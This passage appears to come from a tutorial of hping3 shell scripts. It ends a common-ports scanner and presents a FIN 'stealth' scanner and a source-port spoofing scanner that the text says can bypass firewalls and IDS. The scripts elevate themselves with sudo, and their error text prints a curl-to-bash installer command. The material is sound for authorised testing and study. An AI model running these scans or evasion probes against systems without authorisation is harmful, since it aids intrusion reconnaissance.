    echo -e "${GREEN}[✓] Found $OPEN_COUNT open port(s)${NC}"
    echo ""
    echo -e "${MAGENTA}Open Ports Summary:${NC}"
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    printf "${WHITE}%-10s %-20s${NC}\n" "PORT" "SERVICE"
    echo -e "${CYAN}────────────────────────────────────────${NC}"
    
    # Sort and display open ports
    sort -t: -k1 -n "$OPEN_PORTS_FILE" | while IFS=: read -r port service; do
        printf "${GREEN}%-10s${NC} ${YELLOW}%-20s${NC}\n" "$port/tcp" "$service"
    done
    
    # Group by service type
    echo ""
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    echo -e "${MAGENTA}Services by Category:${NC}"
    echo -e "${CYAN}────────────────────────────────────────${NC}"
    
    # Categorize services
    WEB_PORTS=""
    MAIL_PORTS=""
    DB_PORTS=""
    REMOTE_PORTS=""
    FILE_PORTS=""
    OTHER_PORTS=""
    
    while IFS=: read -r port service; do
        case $port in
            80|443|8080|8443|8000|8888|3000|5000|9000)
                WEB_PORTS="${WEB_PORTS}${port}($service) "
                ;;
            25|110|143|465|587|993|995)
                MAIL_PORTS="${MAIL_PORTS}${port}($service) "
                ;;
            1433|1521|3306|5432|6379|7000|9200|11211|27017)
                DB_PORTS="${DB_PORTS}${port}($service) "
                ;;
            22|23|3389|5900|5901|5902)
                REMOTE_PORTS="${REMOTE_PORTS}${port}($service) "
                ;;
            20|21|69|139|445|873|2049)
                FILE_PORTS="${FILE_PORTS}${port}($service) "
                ;;
            *)
                OTHER_PORTS="${OTHER_PORTS}${port}($service) "
                ;;
        esac
    done < "$OPEN_PORTS_FILE"
    
    [[ -n "$WEB_PORTS" ]] && echo -e "${BLUE}Web Services:${NC} $WEB_PORTS"
    [[ -n "$MAIL_PORTS" ]] && echo -e "${BLUE}Mail Services:${NC} $MAIL_PORTS"
    [[ -n "$DB_PORTS" ]] && echo -e "${BLUE}Database Services:${NC} $DB_PORTS"
    [[ -n "$REMOTE_PORTS" ]] && echo -e "${BLUE}Remote Access:${NC} $REMOTE_PORTS"
    [[ -n "$FILE_PORTS" ]] && echo -e "${BLUE}File Services:${NC} $FILE_PORTS"
    [[ -n "$OTHER_PORTS" ]] && echo -e "${BLUE}Other Services:${NC} $OTHER_PORTS"
    
    # Save report
    REPORT_FILE="common_ports_${TARGET}_$(date +%Y%m%d_%H%M%S).txt"
    {
        echo "Common Ports Scan Report"
        echo "========================"
        echo "Target: $TARGET ($TARGET_IP)"
        echo "Scan Type: $SCAN_DESCRIPTION"
        echo "Total Ports Scanned: $TOTAL_PORTS"
        echo "Open Ports Found: $OPEN_COUNT"
        echo "Scan Date: $(date)"
        echo "Duration: ${DURATION} seconds"
        echo ""
        echo "Open Ports:"
        echo "-----------"
        sort -t: -k1 -n "$OPEN_PORTS_FILE" | while IFS=: read -r port service; do
            printf "%-10s %s\n" "$port/tcp" "$service"
        done
    } > "$REPORT_FILE"
    
    echo ""
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    echo -e "${BLUE}[*] Report saved to: $REPORT_FILE${NC}"
else
    echo -e "${YELLOW}[-] No open ports found${NC}"
    echo -e "${YELLOW}    Possible reasons:${NC}"
    echo -e "${YELLOW}    • All scanned ports are closed${NC}"
    echo -e "${YELLOW}    • Firewall is blocking connections${NC}"
    echo -e "${YELLOW}    • Target is down or unreachable${NC}"
fi

# Display statistics
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}           STATISTICS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "  ${BLUE}Ports Scanned:${NC}  $TOTAL_PORTS"
echo -e "  ${GREEN}Open Ports:${NC}     $OPEN_COUNT"
if [ "$TOTAL_PORTS" -gt 0 ]; then
    echo -e "  ${RED}Success Rate:${NC}   $(( OPEN_COUNT * 100 / TOTAL_PORTS ))%"
else
    echo -e "  ${RED}Success Rate:${NC}   N/A"
fi
echo -e "  ${BLUE}Scan Duration:${NC}  ${DURATION} seconds"
if [ "$TOTAL_PORTS" -gt 0 ]; then
    echo -e "  ${BLUE}Scan Rate:${NC}      ~$(( TOTAL_PORTS / (DURATION + 1) )) ports/sec"
else
    echo -e "  ${BLUE}Scan Rate:${NC}      N/A"
fi
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

# Provide recommendations
if [ "$OPEN_COUNT" -gt 0 ]; then
    echo ""
    echo -e "${YELLOW}Security Recommendations:${NC}"
    echo -e "${CYAN}────────────────────────────────────────${NC}"
    
    # Check for risky services
    if grep -q "23:" "$OPEN_PORTS_FILE" 2>/dev/null; then
        echo -e "${RED}⚠ Telnet (port 23) is insecure - use SSH instead${NC}"
    fi
    if grep -q "21:" "$OPEN_PORTS_FILE" 2>/dev/null; then
        echo -e "${YELLOW}⚠ FTP (port 21) transmits credentials in plaintext${NC}"
    fi
    if grep -q "139:\|445:" "$OPEN_PORTS_FILE" 2>/dev/null; then
        echo -e "${YELLOW}⚠ SMB/NetBIOS ports are exposed - ensure proper access controls${NC}"
    fi
    if grep -q "3389:" "$OPEN_PORTS_FILE" 2>/dev/null; then
        echo -e "${YELLOW}⚠ RDP (port 3389) is exposed - use VPN or restrict access${NC}"
    fi
    if grep -q "3306:\|5432:\|1433:" "$OPEN_PORTS_FILE" 2>/dev/null; then
        echo -e "${YELLOW}⚠ Database ports are exposed - should not be publicly accessible${NC}"
    fi
fi

echo ""
exit 0
EOF

chmod +x ./common_ports_scan.sh

How to Run:

# Scan default common ports
./common_ports_scan.sh example.com

# Scan web server ports
./common_ports_scan.sh example.com web

# Scan database ports
./common_ports_scan.sh example.com database

# Scan top 100 ports
./common_ports_scan.sh example.com top100

# Scan top 1000 ports with 100 threads
./common_ports_scan.sh example.com top1000 100

# Custom port list
./common_ports_scan.sh example.com "22,80,443,3306,8080"

# Get help
./common_ports_scan.sh --help
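The scanner keeps at most `$THREADS` probes in flight by polling `jobs -r` before launching the next one. The same throttle can be tried in isolation; in this sketch the limit of 4 and the sleep-based worker are illustrative placeholders, not values from the script:

```shell
#!/bin/bash
# Throttled background jobs, as used in the scanner's main loop.
THREADS=4
work() { sleep 0.1; echo done; }

tmp=$(mktemp)
for i in $(seq 1 10); do
    work >>"$tmp" &                              # launch one background worker
    # Back off while the number of running jobs is at the cap
    while [ "$(jobs -r | wc -l)" -ge "$THREADS" ]; do
        sleep 0.02
    done
done
wait                                             # drain the remaining workers

COMPLETED=$(wc -l <"$tmp" | tr -d ' ')
echo "completed: $COMPLETED"
rm -f "$tmp"
```

All ten workers finish, but never more than four run at once; the scanner uses the same pattern with `scan_port` as the worker.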

Default Ports Included (selection):
– **21**: FTP (File Transfer Protocol)
– **22**: SSH (Secure Shell)
– **23**: Telnet
– **25**: SMTP (Simple Mail Transfer Protocol)
– **53**: DNS (Domain Name System)
– **80**: HTTP (Hypertext Transfer Protocol)
– **443**: HTTPS (HTTP Secure)
– **3306**: MySQL Database
– **3389**: RDP (Remote Desktop Protocol)
– **5432**: PostgreSQL Database
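The scanner labels each open port from its built-in table and falls back to the system services database. Here is that fallback lookup on its own; the tiny stand-in services file is illustrative, so you can see the parsing without touching `/etc/services`:

```shell
#!/bin/bash
# Service-name lookup, mirroring the script's /etc/services fallback.
lookup_service() {
    local port="$1" db="${2:-/etc/services}"
    # First non-comment entry for <port>/tcp; the first field is the name
    grep -w "^[^#]*$port/tcp" "$db" 2>/dev/null | head -1 | awk '{print $1}'
}

# Try it against a small stand-in services file:
db=$(mktemp)
printf '# comment line\nssh 22/tcp\nhttp 80/tcp\n' > "$db"
lookup_service 22 "$db"    # prints: ssh
lookup_service 80 "$db"    # prints: http
rm -f "$db"
```

Omitting the second argument makes it read the real `/etc/services`, exactly as `get_service_name` does when a port is missing from `SERVICE_NAMES`.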

Script 6: Stealth FIN Scanner

Purpose:

Performs FIN scanning, a stealth technique that sends TCP packets with only the FIN flag set. This can bypass some firewalls and intrusion detection systems that only monitor SYN packets.
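The heart of a FIN scan is interpreting each reply: RST means closed, an ICMP error means filtered, and silence is ambiguous. The classifier below isolates that logic; the reply strings are illustrative samples, not output captured from a real host:

```shell
#!/bin/bash
# Classify a single hping3 FIN-probe reply line, as the script does.
classify_fin_reply() {
    local reply="$1"
    if echo "$reply" | grep -q "flags=RA\|flags=R"; then
        echo "CLOSED"            # RST: the port actively refused the FIN
    elif echo "$reply" | grep -q "ICMP"; then
        echo "FILTERED"          # ICMP unreachable: a firewall intervened
    else
        echo "OPEN|FILTERED"     # silence is ambiguous by design
    fi
}

classify_fin_reply "len=46 ip=203.0.113.10 ttl=56 flags=RA seq=0"   # prints: CLOSED
classify_fin_reply "ICMP Port Unreachable from ip=203.0.113.1"      # prints: FILTERED
classify_fin_reply ""                                               # prints: OPEN|FILTERED
```

This ambiguity of the "no response" case is why the full script sends several packets per port and reports a verdict rather than a certainty.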

Create the Script:

cat > ./fin_scan.sh << 'EOF'
#!/bin/zsh

# TCP FIN Scanner using hping3
# Performs stealthy FIN scans to detect firewall rules and port states
# FIN scanning is a stealth technique that may bypass some firewalls
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
WHITE='\033[1;37m'
NC='\033[0m' # No Color

# Parse arguments
TARGET="$1"
PORT_SPEC="${2:-80}"
COUNT="${3:-2}"
DELAY="${4:-1}"

# Function to print usage
print_usage() {
    local script_name="./fin_scan.sh"
    echo "Usage: $script_name <target> [port|port_range] [count] [delay]"
    echo ""
    echo "Parameters:"
    echo "  target      - Hostname or IP address to scan"
    echo "  port        - Single port or range (e.g., 80 or 80-90)"
    echo "  count       - Number of FIN packets per port (default: 2)"
    echo "  delay       - Delay between packets in seconds (default: 1)"
    echo ""
    echo "Examples:"
    echo "  $script_name example.com                # Scan port 80"
    echo "  $script_name example.com 443            # Scan port 443"
    echo "  $script_name example.com 80-85          # Scan ports 80-85"
    echo "  $script_name 192.168.1.1 22 3 0.5       # 3 packets, 0.5s delay"
    echo ""
    echo "FIN Scan Technique:"
    echo "  - Sends TCP packets with only FIN flag set"
    echo "  - CLOSED ports respond with RST"
    echo "  - OPEN ports typically don't respond (stealth)"
    echo "  - FILTERED ports may send ICMP or no response"
    echo ""
    echo "Response Interpretation:"
    echo "  RST received    = Port is CLOSED"
    echo "  No response     = Port is likely OPEN or FILTERED"
    echo "  ICMP received   = Port is FILTERED by firewall"
}

# Function to validate port
validate_port() {
    local port=$1
    if ! [[ "$port" =~ ^[0-9]+$ ]]; then
        return 1
    fi
    if [ "$port" -lt 1 ] || [ "$port" -gt 65535 ]; then
        return 1
    fi
    return 0
}

# Function to get service name
get_service_name() {
    local port=$1
    # Trim any whitespace from port number
    port=$(echo "$port" | tr -d ' ')
    # Common services
    case $port in
        21) echo "FTP" ;;
        22) echo "SSH" ;;
        23) echo "Telnet" ;;
        25) echo "SMTP" ;;
        53) echo "DNS" ;;
        80) echo "HTTP" ;;
        110) echo "POP3" ;;
        143) echo "IMAP" ;;
        443) echo "HTTPS" ;;
        445) echo "SMB" ;;
        3306) echo "MySQL" ;;
        3389) echo "RDP" ;;
        5432) echo "PostgreSQL" ;;
        6379) echo "Redis" ;;
        8080) echo "HTTP-Alt" ;;
        8443) echo "HTTPS-Alt" ;;
        27017) echo "MongoDB" ;;
        *)
            # Try system services
            local service=$(grep -w "^[^#]*$port/tcp" /etc/services 2>/dev/null | head -1 | awk '{print $1}')
            if [[ -n "$service" ]]; then
                echo "$service"
            else
                echo "Unknown"
            fi
            ;;
    esac
}

# Function to perform FIN scan on a single port
scan_port() {
    local target=$1
    local port=$2
    local count=$3
    local delay=$4
    
    local service=$(get_service_name "$port")
    echo ""
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    echo -e "${BLUE}Scanning Port:${NC} $port/tcp ($service)"
    echo -e "${CYAN}────────────────────────────────────────${NC}"
    
    local responses=0
    local rst_count=0
    local icmp_count=0
    local no_response=0
    
    for i in $(seq 1 $count); do
        echo -e "${YELLOW}[→] Sending FIN packet $i/$count to port $port...${NC}"
        
        # Run hping3 with FIN flag
        local result=$(hping3 -F -p "$port" -c 1 "$target" 2>&1)
        
        # Analyze response
        if echo "$result" | grep -q "flags=RA\|flags=R"; then
            echo -e "${RED}[←] RST received - Port $port is CLOSED${NC}"
            ((rst_count++))
            ((responses++))
        elif echo "$result" | grep -q "ICMP"; then
            echo -e "${YELLOW}[←] ICMP received - Port $port is FILTERED${NC}"
            ((icmp_count++))
            ((responses++))
        elif echo "$result" | grep -q "timeout\|100% packet loss"; then
            echo -e "${GREEN}[◊] No response - Port $port may be OPEN or heavily FILTERED${NC}"
            ((no_response++))
        else
            # Check for any other response
            if echo "$result" | grep -q "len="; then
                echo -e "${BLUE}[←] Unexpected response received${NC}"
                ((responses++))
            else
                echo -e "${GREEN}[◊] No response - Port $port may be OPEN${NC}"
                ((no_response++))
            fi
        fi
        
        # Add delay between packets
        if [ "$i" -lt "$count" ] && [ "$delay" != "0" ]; then
            sleep "$delay"
        fi
    done
    
    # Port state analysis
    echo ""
    echo -e "${CYAN}Port $port Analysis:${NC}"
    echo -e "  Packets sent: $count"
    echo -e "  RST responses: $rst_count"
    echo -e "  ICMP responses: $icmp_count"
    echo -e "  No responses: $no_response"
    
    # Determine likely port state and record it for the final summary
    if [ "$rst_count" -gt 0 ]; then
        echo -e "  ${RED}▸ Verdict: Port $port is CLOSED${NC}"
        CLOSED_PORTS="${CLOSED_PORTS}$port "
        PORT_STATES[$port]="CLOSED"
    elif [ "$icmp_count" -gt 0 ]; then
        echo -e "  ${YELLOW}▸ Verdict: Port $port is FILTERED (firewall blocking)${NC}"
        FILTERED_PORTS="${FILTERED_PORTS}$port "
        PORT_STATES[$port]="FILTERED"
    elif [ "$no_response" -eq "$count" ]; then
        echo -e "  ${GREEN}▸ Verdict: Port $port is likely OPEN or silently FILTERED${NC}"
        echo -e "  ${CYAN}  Note: No response to FIN often indicates OPEN port${NC}"
    else
        echo -e "  ${BLUE}▸ Verdict: Port $port state is UNCERTAIN${NC}"
    fi
    
    return $responses
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Parse port specification (single port or range)
START_PORT=""
END_PORT=""

if [[ "$PORT_SPEC" =~ ^([0-9]+)-([0-9]+)$ ]]; then
    # Port range (zsh compatible)
    START_PORT="${match[1]}"
    END_PORT="${match[2]}"
    
    # Validate range
    if ! validate_port "$START_PORT" || ! validate_port "$END_PORT"; then
        echo -e "${RED}Error: Invalid port range${NC}"
        exit 1
    fi
    
    if [ "$START_PORT" -gt "$END_PORT" ]; then
        echo -e "${RED}Error: Start port must be less than or equal to end port${NC}"
        exit 1
    fi
elif [[ "$PORT_SPEC" =~ ^[0-9]+$ ]]; then
    # Single port
    if ! validate_port "$PORT_SPEC"; then
        echo -e "${RED}Error: Port must be between 1-65535${NC}"
        exit 1
    fi
    START_PORT="$PORT_SPEC"
    END_PORT="$PORT_SPEC"
else
    echo -e "${RED}Error: Invalid port specification${NC}"
    echo "Use a single port (e.g., 80) or range (e.g., 80-90)"
    exit 1
fi

# Validate count
if ! [[ "$COUNT" =~ ^[0-9]+$ ]] || [ "$COUNT" -lt 1 ]; then
    echo -e "${RED}Error: Count must be a positive number${NC}"
    exit 1
fi

# Validate delay
if ! [[ "$DELAY" =~ ^[0-9]*\.?[0-9]+$ ]]; then
    echo -e "${RED}Error: Delay must be a number${NC}"
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: FIN scan requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Calculate total ports
TOTAL_PORTS=$((END_PORT - START_PORT + 1))

# Display header
echo -e "${MAGENTA}╔════════════════════════════════════════╗${NC}"
echo -e "${MAGENTA}║         TCP FIN SCANNER                ║${NC}"
echo -e "${MAGENTA}║      (Stealth Scan Technique)          ║${NC}"
echo -e "${MAGENTA}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}         $TARGET"
if [ "$START_PORT" -eq "$END_PORT" ]; then
    echo -e "  ${BLUE}Port:${NC}           $START_PORT"
else
    echo -e "  ${BLUE}Port Range:${NC}     $START_PORT-$END_PORT ($TOTAL_PORTS ports)"
fi
echo -e "  ${BLUE}Packets/Port:${NC}   $COUNT"
echo -e "  ${BLUE}Packet Delay:${NC}   ${DELAY}s"
echo -e "  ${BLUE}Scan Type:${NC}      TCP FIN (Stealth)"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

# Resolve target
echo ""
echo -e "${YELLOW}[*] Resolving target...${NC}"
TARGET_IP=$(ping -c 1 "$TARGET" 2>/dev/null | grep -oE "\([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\)" | tr -d '()')
if [ -z "$TARGET_IP" ]; then
    TARGET_IP="$TARGET"
    echo -e "${YELLOW}[*] Could not resolve hostname, using as-is${NC}"
else
    echo -e "${GREEN}[✓] Target resolved to: $TARGET_IP${NC}"
fi

# Start time
START_TIME=$(date +%s)

echo ""
echo -e "${GREEN}[+] Starting FIN scan...${NC}"
echo -e "${CYAN}[i] FIN scan sends TCP packets with only the FIN flag set${NC}"
echo -e "${CYAN}[i] This technique may bypass some packet filters and IDS${NC}"

# Results tracking
declare -A PORT_STATES
OPEN_PORTS=""
CLOSED_PORTS=""
FILTERED_PORTS=""

# Main scanning loop
for port in $(seq $START_PORT $END_PORT); do
    scan_port "$TARGET_IP" "$port" "$COUNT" "$DELAY"
    rc=$?   # capture immediately; scan_port returns its response count
    
    # Zero responses to a FIN probe usually means OPEN (or silently filtered)
    if [ "$rc" -eq 0 ]; then
        OPEN_PORTS="${OPEN_PORTS}$port "
        PORT_STATES[$port]="OPEN/FILTERED"
    fi
done

# End time
END_TIME=$(date +%s)
DURATION=$((END_TIME - START_TIME))

# Generate summary report
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}         SCAN SUMMARY${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Count results
OPEN_COUNT=$(echo "$OPEN_PORTS" | wc -w | tr -d ' ')
CLOSED_COUNT=$(echo "$CLOSED_PORTS" | wc -w | tr -d ' ')
FILTERED_COUNT=$(echo "$FILTERED_PORTS" | wc -w | tr -d ' ')

echo -e "${BLUE}Scan Results:${NC}"
echo -e "  Total Ports Scanned: $TOTAL_PORTS"
echo -e "  Likely Open/Filtered: $OPEN_COUNT"
echo -e "  Confirmed Closed: $CLOSED_COUNT"
echo -e "  Confirmed Filtered: $FILTERED_COUNT"
echo -e "  Scan Duration: ${DURATION} seconds"

if [ "$OPEN_COUNT" -gt 0 ]; then
    echo ""
    echo -e "${GREEN}Potentially Open Ports:${NC}"
    for port in $OPEN_PORTS; do
        service=$(get_service_name "$port")
        echo -e "  ${GREEN}▸${NC} Port $port/tcp - $service"
    done
fi

# Save report to file
REPORT_FILE="fin_scan_${TARGET}_$(date +%Y%m%d_%H%M%S).txt"
{
    echo "TCP FIN Scan Report"
    echo "==================="
    echo "Target: $TARGET ($TARGET_IP)"
    echo "Port Range: $START_PORT-$END_PORT"
    echo "Scan Date: $(date)"
    echo "Duration: ${DURATION} seconds"
    echo "Technique: TCP FIN (Stealth Scan)"
    echo ""
    echo "Results:"
    echo "--------"
    echo "Likely Open/Filtered: $OPEN_COUNT"
    echo "Confirmed Closed: $CLOSED_COUNT"
    echo "Confirmed Filtered: $FILTERED_COUNT"
    
    if [ "$OPEN_COUNT" -gt 0 ]; then
        echo ""
        echo "Potentially Open Ports:"
        for port in $OPEN_PORTS; do
            service=$(get_service_name "$port")
            echo "  Port $port/tcp - $service"
        done
    fi
} > "$REPORT_FILE"

echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${BLUE}[*] Report saved to: $REPORT_FILE${NC}"
echo ""
echo -e "${YELLOW}Important Notes:${NC}"
echo -e "${CYAN}• FIN scanning is a stealth technique${NC}"
echo -e "${CYAN}• No response often indicates an OPEN port${NC}"
echo -e "${CYAN}• RST response indicates a CLOSED port${NC}"
echo -e "${CYAN}• Results may vary based on firewall rules${NC}"
echo -e "${CYAN}• Some systems may not follow RFC standards${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit 0
EOF

chmod +x ./fin_scan.sh

How to Run:

# Scan default port 80
./fin_scan.sh example.com

# Scan specific port
./fin_scan.sh example.com 443

# Scan port range
./fin_scan.sh example.com 80-85

# Custom parameters
./fin_scan.sh 192.168.1.1 22 3 0.5

# Quick single packet scan
./fin_scan.sh server.com 80-443 1 0

# Get help
./fin_scan.sh --help

Response Interpretation:
– **No response**: Port likely open (or filtered)
– **RST response**: Port closed
– **ICMP unreachable**: Port filtered

Script 7: Source Port Spoofing

Purpose:
Sets the source port of outgoing probes in an attempt to bypass firewall rules that allow traffic from specific “trusted” source ports, such as DNS (53) or FTP-DATA (20).
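The comparison this script automates can be sketched by hand. The probe commands are shown as comments because they need root and a live target, and the host and ports are placeholders; if only the second probe gets a SYN+ACK back, the firewall likely trusts source port 53:

```shell
#!/bin/bash
# Manual source-port spoofing check (commands are illustrative):
#
#   sudo hping3 -S -p 80 -c 1 target.example          # ephemeral source port
#   sudo hping3 -S -p 80 -s 53 -c 1 target.example    # spoofed DNS source port
#
# Compare the two outcomes:
spoof_verdict() {
    local normal="$1" spoofed="$2"    # each: "open" or "blocked"
    if [ "$normal" = "blocked" ] && [ "$spoofed" = "open" ]; then
        echo "source-port trust rule likely present"
    else
        echo "no evidence of a source-port trust rule"
    fi
}

spoof_verdict blocked open    # prints: source-port trust rule likely present
spoof_verdict open open       # prints: no evidence of a source-port trust rule
```

A port that answers identically to both probes tells you nothing about source-port filtering; only a difference between the two runs is meaningful.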

Create the Script:

cat > ./source_port_scan.sh << 'EOF'
#!/bin/zsh

# Source Port Spoofing Scanner using hping3
# Attempts to bypass firewalls that trust certain source ports
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
NC='\033[0m' # No Color

# Parse arguments early
TARGET="$1"
DEST_PORT="${2:-80}"
SOURCE_PORT="${3:-53}"
COUNT="${4:-1}"

# Function to print usage
print_usage() {
    local script_name="./source_port_scan.sh"
    echo "Usage: $script_name <target> [dest_port] [source_port] [count]"
    echo ""
    echo "Parameters:"
    echo "  target       - Hostname or IP address to scan"
    echo "  dest_port    - Destination port to scan (default: 80)"
    echo "  source_port  - Source port to spoof (default: 53)"
    echo "  count        - Number of packets to send (default: 1)"
    echo ""
    echo "Common trusted source ports:"
    echo "  53 (DNS), 20 (FTP-DATA), 123 (NTP), 67/68 (DHCP)"
    echo ""
    echo "Examples:"
    echo "  $script_name example.com                  # Scan port 80 from source port 53"
    echo "  $script_name example.com 443               # Scan port 443 from source port 53"
    echo "  $script_name example.com 80 20             # Scan port 80 from source port 20"
    echo "  $script_name example.com 80 53 3           # Send 3 packets"
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: Source port scan requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Map common source ports to names
declare -A source_services
source_services[53]="DNS"
source_services[20]="FTP-DATA"
source_services[123]="NTP"
source_services[67]="DHCP"
source_services[68]="DHCP"
source_services[88]="Kerberos"
source_services[500]="IKE/IPSec"

SERVICE_NAME=${source_services[$SOURCE_PORT]:-"Custom"}

# Display header
echo -e "${MAGENTA}╔════════════════════════════════════════╗${NC}"
echo -e "${MAGENTA}║    SOURCE PORT SPOOFING SCANNER        ║${NC}"
echo -e "${MAGENTA}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}         $TARGET:$DEST_PORT"
echo -e "  ${BLUE}Source Port:${NC}    $SOURCE_PORT ($SERVICE_NAME)"
echo -e "  ${BLUE}Packet Count:${NC}   $COUNT"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""
echo -e "${YELLOW}[*] Attempting to bypass firewall rules that trust source port $SOURCE_PORT${NC}"
echo -e "${CYAN}[i] Some firewalls allow traffic from 'trusted' source ports${NC}"
echo ""

# Resolve target
echo -e "${YELLOW}[*] Resolving target...${NC}"
TARGET_IP=$(ping -c 1 "$TARGET" 2>/dev/null | grep -oE "\([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\)" | tr -d '()')
if [ -z "$TARGET_IP" ]; then
    TARGET_IP="$TARGET"
    echo -e "${YELLOW}[*] Could not resolve hostname, using as-is${NC}"
else
    echo -e "${GREEN}[✓] Target resolved to: $TARGET_IP${NC}"
fi

echo ""
echo -e "${GREEN}[+] Starting source port spoofing scan...${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

OPEN_COUNT=0
CLOSED_COUNT=0
FILTERED_COUNT=0

for i in $(seq 1 $COUNT); do
    echo -e "${CYAN}[→] Sending SYN packet $i/$COUNT from port $SOURCE_PORT...${NC}"
    result=$(hping3 -S -p $DEST_PORT -s $SOURCE_PORT -c 1 $TARGET_IP 2>&1)
    
    if echo "$result" | grep -q "flags=SA\|flags=S\.A"; then
        echo -e "${GREEN}[✓] Port $DEST_PORT appears OPEN (SYN+ACK received)${NC}"
        echo -e "${GREEN}    → Source port spoofing may have bypassed filtering!${NC}"
        ((OPEN_COUNT++))
    elif echo "$result" | grep -q "flags=RA\|flags=R"; then
        echo -e "${RED}[✗] Port $DEST_PORT appears CLOSED (RST received)${NC}"
        ((CLOSED_COUNT++))
    elif echo "$result" | grep -q "ICMP"; then
        icmp_type=$(echo "$result" | grep -oE "ICMP [^,]+" | head -1)
        echo -e "${YELLOW}[!] ICMP response received: $icmp_type${NC}"
        echo -e "${YELLOW}    → Port is likely FILTERED by firewall${NC}"
        ((FILTERED_COUNT++))
    elif echo "$result" | grep -q "100% packet loss\|timeout"; then
        echo -e "${YELLOW}[?] No response - Port $DEST_PORT may be FILTERED${NC}"
        ((FILTERED_COUNT++))
    else
        # Check for any response
        if echo "$result" | grep -q "len="; then
            echo -e "${BLUE}[←] Unexpected response received${NC}"
            echo "$result" | grep "len=" | head -1
        else
            echo -e "${YELLOW}[?] No response - Port $DEST_PORT may be FILTERED${NC}"
            ((FILTERED_COUNT++))
        fi
    fi
    
    if [ "$i" -lt "$COUNT" ]; then
        sleep 0.5
    fi
done

echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}         SCAN SUMMARY${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""
echo -e "${BLUE}Target:${NC} $TARGET ($TARGET_IP)"
echo -e "${BLUE}Port Scanned:${NC} $DEST_PORT"
echo -e "${BLUE}Source Port Used:${NC} $SOURCE_PORT ($SERVICE_NAME)"
echo ""

if [ "$OPEN_COUNT" -gt 0 ]; then
    echo -e "${GREEN}▸ Verdict: Port $DEST_PORT is OPEN${NC}"
    echo -e "${GREEN}  ✓ Source port $SOURCE_PORT successfully bypassed filtering!${NC}"
    echo -e "${YELLOW}  ⚠ Warning: Firewall may be misconfigured to trust port $SOURCE_PORT${NC}"
elif [ "$CLOSED_COUNT" -gt 0 ]; then
    echo -e "${RED}▸ Verdict: Port $DEST_PORT is CLOSED${NC}"
